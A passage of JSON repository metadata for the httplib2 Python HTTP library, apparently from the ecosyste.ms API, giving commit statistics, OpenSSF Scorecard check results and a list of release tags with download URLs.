fee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at"